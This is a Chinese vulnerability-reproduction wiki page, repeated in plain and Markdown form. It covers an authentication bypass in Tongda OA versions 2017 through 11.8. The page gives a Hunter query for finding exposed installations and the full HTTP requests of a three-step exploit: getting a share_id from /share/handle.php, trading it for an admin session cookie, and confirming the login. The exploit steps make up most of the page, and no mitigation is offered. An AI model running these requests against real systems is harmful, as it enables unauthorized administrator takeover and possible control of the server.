fofamini-wiki

登录白背景

源码

通达OA share身份认证绕过漏洞

一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

二、影响版本

通达OA2017-通达OA11.8

三、资产测绘

hunter：app.name="通达 OA"

登录页面

四、漏洞复现

获取share_id

GET /share/handle.php?module=2&module_id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

使用上一步获取的share_id,获取cookie,当响应为302时代表存在漏洞

GET /share/index.php?share_id=AD2E81D9-11E8-B2FF-61B9-28D25E2D4DCE HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

使用上一步获取的cookie，验证是否成功登录

GET /general/golog.php?version=ie6 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: PHPSESSID=9ud7cua7ol90pq1gi9ehtri2g3; path=/
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

general/index.php?isIE=0&modify_pwd=0

原文: https://www.yuque.com/xiaokp7/ocvun2/olxwq1h91px0w7ur

# 通达OA share身份认证绕过漏洞

# 一、漏洞简介
通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

# 二、影响版本

- 通达OA2017-通达OA11.8

# 三、资产测绘

- hunter：`app.name="通达 OA"`

![image.png](./img/QP-anLuBEGAuSJYT/1692003460335-993393b7-6356-4e6d-b55c-8d1d61492f8a-688081.png)

- 登录页面

![image.png](./img/QP-anLuBEGAuSJYT/1692003485971-9050a76c-feac-4831-8ab4-cae1098ba778-254745.png)

# 四、漏洞复现

1. 获取`share_id`
```java
GET /share/handle.php?module=2&module_id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![image.png](./img/QP-anLuBEGAuSJYT/1697034790197-91d70693-a755-41d1-a488-d782846748a2-678345.png)

2. 使用上一步获取的share_id,获取cookie,当响应为302时代表存在漏洞
```java
GET /share/index.php?share_id=AD2E81D9-11E8-B2FF-61B9-28D25E2D4DCE HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![image.png](./img/QP-anLuBEGAuSJYT/1697034852132-e74d3953-e15a-466c-b1e8-25277653ab99-107837.png)

3. 使用上一步获取的cookie，验证是否成功登录
```java
GET /general/golog.php?version=ie6 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: PHPSESSID=9ud7cua7ol90pq1gi9ehtri2g3; path=/
Host: 192.168.31.164
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![image.png](./img/QP-anLuBEGAuSJYT/1697034894024-cb4a802a-bd27-4f8e-931b-a35a4df0104d-338019.png)
```java
general/index.php?isIE=0&modify_pwd=0
```

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/olxwq1h91px0w7ur>